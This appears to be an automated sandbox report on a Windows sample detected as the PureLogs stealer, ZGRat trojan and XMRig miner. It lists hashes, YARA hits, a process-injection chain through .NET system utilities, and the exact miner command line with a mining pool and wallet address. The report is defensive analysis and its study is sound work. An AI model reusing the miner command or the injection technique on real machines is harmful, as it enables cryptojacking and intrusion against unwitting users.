purelogs | 311a3b7def97fc40fd72447b9e581401e5dcb7ecb6fc75e160035c87746452fa

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
03-12-2023 04:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64944a1f7d846006e04b6101d40a28b4.exe
Size

1.2MB
MD5

64944a1f7d846006e04b6101d40a28b4
SHA1

139989bce70344cee6a009cbe197e43c263aa6a5
SHA256

311a3b7def97fc40fd72447b9e581401e5dcb7ecb6fc75e160035c87746452fa
SHA512

da01745a7bdefaaaa698d20b8c4c3f9a223dc49886d86560b42916f9b168249c54b6360ceebe18b5400f500247eafd8513c49cdc018995f7e770b3d775939dba
SSDEEP

24576:yV4G6JWrIWNuFYRF4Bs2kpvjpqzeRVXJIcXStT:y4WrIWMietCvjtRVJCJ

Score

10^/10

purelogs xmrig zgrat miner rat stealer

Malware Config

Signatures

Detect PureLogs payload 11 IoCs

resource	yara_rule
behavioral2/memory/4036-0-0x0000021E65A70000-0x0000021E65BA8000-memory.dmp	family_purelogs
behavioral2/files/0x0007000000023241-2202.dat	family_purelogs
behavioral2/files/0x0007000000023241-2203.dat	family_purelogs
behavioral2/files/0x0007000000023241-2207.dat	family_purelogs
behavioral2/files/0x000c00000002324d-6591.dat	family_purelogs
behavioral2/files/0x000c00000002324d-6592.dat	family_purelogs
behavioral2/memory/1524-6593-0x0000011E170E0000-0x0000011E17220000-memory.dmp	family_purelogs
behavioral2/files/0x000c00000002324d-6601.dat	family_purelogs
behavioral2/files/0x0006000000023253-6614.dat	family_purelogs
behavioral2/files/0x0006000000023253-6615.dat	family_purelogs
behavioral2/files/0x0006000000023253-6619.dat	family_purelogs

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral2/memory/3972-11-0x000001FF596D0000-0x000001FF597B4000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-15-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-16-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-18-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-20-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-22-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-24-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-26-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-28-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-30-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-32-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-34-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-36-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-38-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-40-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-42-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-44-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-46-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-48-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-50-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-52-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-54-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-56-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-58-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-60-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-62-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-64-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-66-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-68-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-70-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-72-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-74-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/3972-76-0x000001FF596D0000-0x000001FF597B0000-memory.dmp	family_zgrat_v1
behavioral2/memory/1980-6605-0x0000024850930000-0x0000024850A30000-memory.dmp	family_zgrat_v1

PureLogs
PureLogs is an infostealer written in C#.
stealer purelogs
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral2/memory/4004-6643-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 6 IoCs

pid	Process
4252	Default.exe
1412	Default.exe
1524	kzhbkkdw.exe
1980	kzhbkkdw.exe
2808	TypeId.exe
2868	TypeId.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4036 set thread context of 3972	4036	64944a1f7d846006e04b6101d40a28b4.exe	88
PID 4252 set thread context of 1412	4252	Default.exe	99
PID 1412 set thread context of 224	1412	Default.exe	101
PID 224 set thread context of 4464	224	InstallUtil.exe	102
PID 1524 set thread context of 1980	1524	kzhbkkdw.exe	104
PID 2808 set thread context of 2868	2808	TypeId.exe	106
PID 2868 set thread context of 1780	2868	TypeId.exe	107
PID 1780 set thread context of 4148	1780	RegAsm.exe	108
PID 4148 set thread context of 4004	4148	RegAsm.exe	109

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
1412	Default.exe
1412	Default.exe
1412	Default.exe
1412	Default.exe
1524	kzhbkkdw.exe
2808	TypeId.exe
1780	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe
4148	RegAsm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	4036	64944a1f7d846006e04b6101d40a28b4.exe
Token: SeDebugPrivilege	3972	64944a1f7d846006e04b6101d40a28b4.exe
Token: SeDebugPrivilege	4252	Default.exe
Token: SeDebugPrivilege	1412	Default.exe
Token: SeDebugPrivilege	224	InstallUtil.exe
Token: SeDebugPrivilege	4464	InstallUtil.exe
Token: SeDebugPrivilege	1524	kzhbkkdw.exe
Token: SeDebugPrivilege	1980	kzhbkkdw.exe
Token: SeDebugPrivilege	2808	TypeId.exe
Token: SeDebugPrivilege	2868	TypeId.exe
Token: SeDebugPrivilege	1780	RegAsm.exe
Token: SeDebugPrivilege	4148	RegAsm.exe
Token: SeLockMemoryPrivilege	4004	AddInProcess.exe
Token: SeLockMemoryPrivilege	4004	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4004	AddInProcess.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 4036 wrote to memory of 3972	4036	64944a1f7d846006e04b6101d40a28b4.exe	88
PID 4036 wrote to memory of 3972	4036	64944a1f7d846006e04b6101d40a28b4.exe	88
PID 4036 wrote to memory of 3972	4036	64944a1f7d846006e04b6101d40a28b4.exe	88
PID 4036 wrote to memory of 3972	4036	64944a1f7d846006e04b6101d40a28b4.exe	88
PID 4036 wrote to memory of 3972	4036	64944a1f7d846006e04b6101d40a28b4.exe	88
PID 4036 wrote to memory of 3972	4036	64944a1f7d846006e04b6101d40a28b4.exe	88
PID 4252 wrote to memory of 1412	4252	Default.exe	99
PID 4252 wrote to memory of 1412	4252	Default.exe	99
PID 4252 wrote to memory of 1412	4252	Default.exe	99
PID 4252 wrote to memory of 1412	4252	Default.exe	99
PID 4252 wrote to memory of 1412	4252	Default.exe	99
PID 4252 wrote to memory of 1412	4252	Default.exe	99
PID 1412 wrote to memory of 224	1412	Default.exe	101
PID 1412 wrote to memory of 224	1412	Default.exe	101
PID 1412 wrote to memory of 224	1412	Default.exe	101
PID 1412 wrote to memory of 224	1412	Default.exe	101
PID 1412 wrote to memory of 224	1412	Default.exe	101
PID 1412 wrote to memory of 224	1412	Default.exe	101
PID 224 wrote to memory of 4464	224	InstallUtil.exe	102
PID 224 wrote to memory of 4464	224	InstallUtil.exe	102
PID 224 wrote to memory of 4464	224	InstallUtil.exe	102
PID 224 wrote to memory of 4464	224	InstallUtil.exe	102
PID 224 wrote to memory of 4464	224	InstallUtil.exe	102
PID 224 wrote to memory of 4464	224	InstallUtil.exe	102
PID 1524 wrote to memory of 1980	1524	kzhbkkdw.exe	104
PID 1524 wrote to memory of 1980	1524	kzhbkkdw.exe	104
PID 1524 wrote to memory of 1980	1524	kzhbkkdw.exe	104
PID 1524 wrote to memory of 1980	1524	kzhbkkdw.exe	104
PID 1524 wrote to memory of 1980	1524	kzhbkkdw.exe	104
PID 1524 wrote to memory of 1980	1524	kzhbkkdw.exe	104
PID 2808 wrote to memory of 2868	2808	TypeId.exe	106
PID 2808 wrote to memory of 2868	2808	TypeId.exe	106
PID 2808 wrote to memory of 2868	2808	TypeId.exe	106
PID 2808 wrote to memory of 2868	2808	TypeId.exe	106
PID 2808 wrote to memory of 2868	2808	TypeId.exe	106
PID 2808 wrote to memory of 2868	2808	TypeId.exe	106
PID 2868 wrote to memory of 1780	2868	TypeId.exe	107
PID 2868 wrote to memory of 1780	2868	TypeId.exe	107
PID 2868 wrote to memory of 1780	2868	TypeId.exe	107
PID 2868 wrote to memory of 1780	2868	TypeId.exe	107
PID 2868 wrote to memory of 1780	2868	TypeId.exe	107
PID 2868 wrote to memory of 1780	2868	TypeId.exe	107
PID 1780 wrote to memory of 4148	1780	RegAsm.exe	108
PID 1780 wrote to memory of 4148	1780	RegAsm.exe	108
PID 1780 wrote to memory of 4148	1780	RegAsm.exe	108
PID 1780 wrote to memory of 4148	1780	RegAsm.exe	108
PID 1780 wrote to memory of 4148	1780	RegAsm.exe	108
PID 1780 wrote to memory of 4148	1780	RegAsm.exe	108
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109
PID 4148 wrote to memory of 4004	4148	RegAsm.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\64944a1f7d846006e04b6101d40a28b4.exe
"C:\Users\Admin\AppData\Local\Temp\64944a1f7d846006e04b6101d40a28b4.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4036
- C:\Users\Admin\AppData\Local\Temp\64944a1f7d846006e04b6101d40a28b4.exe
  C:\Users\Admin\AppData\Local\Temp\64944a1f7d846006e04b6101d40a28b4.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3972

C:\Users\Admin\AppData\Local\Exception\divhk\Default.exe
C:\Users\Admin\AppData\Local\Exception\divhk\Default.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Users\Admin\AppData\Local\Exception\divhk\Default.exe
  C:\Users\Admin\AppData\Local\Exception\divhk\Default.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:224
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4464

C:\Users\Admin\AppData\Local\Temp\kzhbkkdw.exe
C:\Users\Admin\AppData\Local\Temp\kzhbkkdw.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1524
- C:\Users\Admin\AppData\Local\Temp\kzhbkkdw.exe
  C:\Users\Admin\AppData\Local\Temp\kzhbkkdw.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1980

C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
  C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4148
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50
        5⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Exception\divhk\Default.exe

Filesize
1.2MB

MD5
64944a1f7d846006e04b6101d40a28b4

SHA1
139989bce70344cee6a009cbe197e43c263aa6a5

SHA256
311a3b7def97fc40fd72447b9e581401e5dcb7ecb6fc75e160035c87746452fa

SHA512
da01745a7bdefaaaa698d20b8c4c3f9a223dc49886d86560b42916f9b168249c54b6360ceebe18b5400f500247eafd8513c49cdc018995f7e770b3d775939dba

Download Submit
C:\Users\Admin\AppData\Local\Exception\divhk\Default.exe

Filesize
1.2MB

MD5
64944a1f7d846006e04b6101d40a28b4

SHA1
139989bce70344cee6a009cbe197e43c263aa6a5

SHA256
311a3b7def97fc40fd72447b9e581401e5dcb7ecb6fc75e160035c87746452fa

SHA512
da01745a7bdefaaaa698d20b8c4c3f9a223dc49886d86560b42916f9b168249c54b6360ceebe18b5400f500247eafd8513c49cdc018995f7e770b3d775939dba

Download Submit
C:\Users\Admin\AppData\Local\Exception\divhk\Default.exe

Filesize
1.2MB

MD5
64944a1f7d846006e04b6101d40a28b4

SHA1
139989bce70344cee6a009cbe197e43c263aa6a5

SHA256
311a3b7def97fc40fd72447b9e581401e5dcb7ecb6fc75e160035c87746452fa

SHA512
da01745a7bdefaaaa698d20b8c4c3f9a223dc49886d86560b42916f9b168249c54b6360ceebe18b5400f500247eafd8513c49cdc018995f7e770b3d775939dba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\64944a1f7d846006e04b6101d40a28b4.exe.log

Filesize
1KB

MD5
84a01db52ea5a878520e162c80acfcd3

SHA1
49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

SHA256
25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

SHA512
0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Default.exe.log

Filesize
1KB

MD5
84a01db52ea5a878520e162c80acfcd3

SHA1
49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

SHA256
25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

SHA512
0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RegAsm.exe.log

Filesize
1KB

MD5
84a01db52ea5a878520e162c80acfcd3

SHA1
49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

SHA256
25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

SHA512
0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log

Filesize
1KB

MD5
84a01db52ea5a878520e162c80acfcd3

SHA1
49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

SHA256
25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

SHA512
0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log

Filesize
1KB

MD5
84a01db52ea5a878520e162c80acfcd3

SHA1
49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

SHA256
25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

SHA512
0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\kzhbkkdw.exe.log

Filesize
1KB

MD5
84a01db52ea5a878520e162c80acfcd3

SHA1
49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

SHA256
25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

SHA512
0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

Download Submit
C:\Users\Admin\AppData\Local\Temp\kzhbkkdw.exe

Filesize
1.2MB

MD5
ba30ecbbd32cbd96717cd1c7556d8a5b

SHA1
c6a0abe5f547383129058c847271019d31fec8b7

SHA256
d88b4a9076f8711e1d7f5593e626581c2d158a6f984baa6459f4f505e8748c3e

SHA512
c642f11ac4128410cf25096bc97963b73d04f10dee4e0f9b0dfd78a4ed93f4260882a2315b66327c9f4e766c15593fbc79c2b82093f0874044111170047f0d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\kzhbkkdw.exe

Filesize
1.2MB

MD5
ba30ecbbd32cbd96717cd1c7556d8a5b

SHA1
c6a0abe5f547383129058c847271019d31fec8b7

SHA256
d88b4a9076f8711e1d7f5593e626581c2d158a6f984baa6459f4f505e8748c3e

SHA512
c642f11ac4128410cf25096bc97963b73d04f10dee4e0f9b0dfd78a4ed93f4260882a2315b66327c9f4e766c15593fbc79c2b82093f0874044111170047f0d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\kzhbkkdw.exe

Filesize
1.2MB

MD5
ba30ecbbd32cbd96717cd1c7556d8a5b

SHA1
c6a0abe5f547383129058c847271019d31fec8b7

SHA256
d88b4a9076f8711e1d7f5593e626581c2d158a6f984baa6459f4f505e8748c3e

SHA512
c642f11ac4128410cf25096bc97963b73d04f10dee4e0f9b0dfd78a4ed93f4260882a2315b66327c9f4e766c15593fbc79c2b82093f0874044111170047f0d45

Download Submit
C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

Filesize
1.2MB

MD5
ba30ecbbd32cbd96717cd1c7556d8a5b

SHA1
c6a0abe5f547383129058c847271019d31fec8b7

SHA256
d88b4a9076f8711e1d7f5593e626581c2d158a6f984baa6459f4f505e8748c3e

SHA512
c642f11ac4128410cf25096bc97963b73d04f10dee4e0f9b0dfd78a4ed93f4260882a2315b66327c9f4e766c15593fbc79c2b82093f0874044111170047f0d45

Download Submit
C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

Filesize
1.2MB

MD5
ba30ecbbd32cbd96717cd1c7556d8a5b

SHA1
c6a0abe5f547383129058c847271019d31fec8b7

SHA256
d88b4a9076f8711e1d7f5593e626581c2d158a6f984baa6459f4f505e8748c3e

SHA512
c642f11ac4128410cf25096bc97963b73d04f10dee4e0f9b0dfd78a4ed93f4260882a2315b66327c9f4e766c15593fbc79c2b82093f0874044111170047f0d45

Download Submit
C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

Filesize
1.2MB

MD5
ba30ecbbd32cbd96717cd1c7556d8a5b

SHA1
c6a0abe5f547383129058c847271019d31fec8b7

SHA256
d88b4a9076f8711e1d7f5593e626581c2d158a6f984baa6459f4f505e8748c3e

SHA512
c642f11ac4128410cf25096bc97963b73d04f10dee4e0f9b0dfd78a4ed93f4260882a2315b66327c9f4e766c15593fbc79c2b82093f0874044111170047f0d45

Download Submit
memory/224-4398-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/224-4404-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1412-2210-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1412-2211-0x0000029A55D10000-0x0000029A55D20000-memory.dmp

Filesize
64KB

Download
memory/1412-4396-0x0000029A55D10000-0x0000029A55D20000-memory.dmp

Filesize
64KB

Download
memory/1412-4397-0x0000029A55D10000-0x0000029A55D20000-memory.dmp

Filesize
64KB

Download
memory/1412-4399-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1524-6597-0x0000011E31A00000-0x0000011E31AD0000-memory.dmp

Filesize
832KB

Download
memory/1524-6598-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1524-6622-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1524-6596-0x0000011E31830000-0x0000011E31900000-memory.dmp

Filesize
832KB

Download
memory/1524-6593-0x0000011E170E0000-0x0000011E17220000-memory.dmp

Filesize
1.2MB

Download
memory/1524-6594-0x0000011E315F0000-0x0000011E316DA000-memory.dmp

Filesize
936KB

Download
memory/1524-6595-0x0000011E31740000-0x0000011E31828000-memory.dmp

Filesize
928KB

Download
memory/1780-6628-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1780-6629-0x000002BA66A50000-0x000002BA66A60000-memory.dmp

Filesize
64KB

Download
memory/1780-6636-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1980-6611-0x00000248380C0000-0x00000248380D0000-memory.dmp

Filesize
64KB

Download
memory/1980-6612-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/1980-6605-0x0000024850930000-0x0000024850A30000-memory.dmp

Filesize
1024KB

Download
memory/1980-6606-0x0000024850B70000-0x0000024850B78000-memory.dmp

Filesize
32KB

Download
memory/1980-6604-0x0000000000400000-0x00000000004B2000-memory.dmp

Filesize
712KB

Download
memory/1980-6607-0x0000024850B80000-0x0000024850BD6000-memory.dmp

Filesize
344KB

Download
memory/1980-6610-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/2808-6625-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/2808-6616-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/2808-6617-0x0000028A67D10000-0x0000028A67D20000-memory.dmp

Filesize
64KB

Download
memory/2868-6623-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/2868-6624-0x0000026CB1580000-0x0000026CB1590000-memory.dmp

Filesize
64KB

Download
memory/2868-6627-0x0000026CB1580000-0x0000026CB1590000-memory.dmp

Filesize
64KB

Download
memory/2868-6630-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/3972-22-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-60-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-2199-0x000001FF59D00000-0x000001FF59D54000-memory.dmp

Filesize
336KB

Download
memory/3972-2201-0x00007FF837730000-0x00007FF8381F1000-memory.dmp

Filesize
10.8MB

Download
memory/3972-50-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-48-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-54-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-56-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-46-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-44-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-42-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-40-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-58-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-38-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-36-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-34-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-32-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

